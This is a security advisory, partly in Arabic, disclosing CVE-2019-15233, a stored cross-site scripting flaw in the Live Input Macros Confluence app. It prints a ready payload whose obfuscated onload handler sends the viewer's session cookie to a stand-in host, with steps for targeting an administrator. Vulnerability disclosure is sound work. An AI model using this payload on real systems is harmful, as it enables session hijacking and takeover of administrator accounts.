
(FAB-2019-00157) ثغرة اكتشفتها CVE-2019-15233
(FAB-2019-00157) تم اكتشاف الثغرة بواسطتي CVE-2019-15233
الإفادة الأمنية: advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
تم العثور على هذه الثغرة الأمنية بواسطة Francesco Emanuel Bennici [email protected] من شركة FABMation GmbH.
يمنح Live Input Macros المستخدمين إمكانية إضافة مربعات اختيار وأزرار اختيار وقوائم منسدلة والمزيد إلى صفحات Confluence الخاصة بك وإجراء التغييرات دون تحرير الصفحة.
يمكن للمهاجم تنفيذ كود JavaScript على موقع Confluence إذا أضاف المستخدم الكود الخبيث.
يمكن استخدام هذا لسرقة ملف تعريف الارتباط الخاص بالجلسة لمستخدم (مثلاً) مسؤول (اختطاف الجلسة).
انسخ هذا المحتوى:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
ثم قم بإنشاء عنصر جديد في صفحة Confluence. الصق هذا النص فيه وشارك صفحة Confluence مع (مثلاً) مسؤول النظام، وإذا قام بالوصول إلى الموقع، يمكنك اختطاف / "نسخ" جلسته.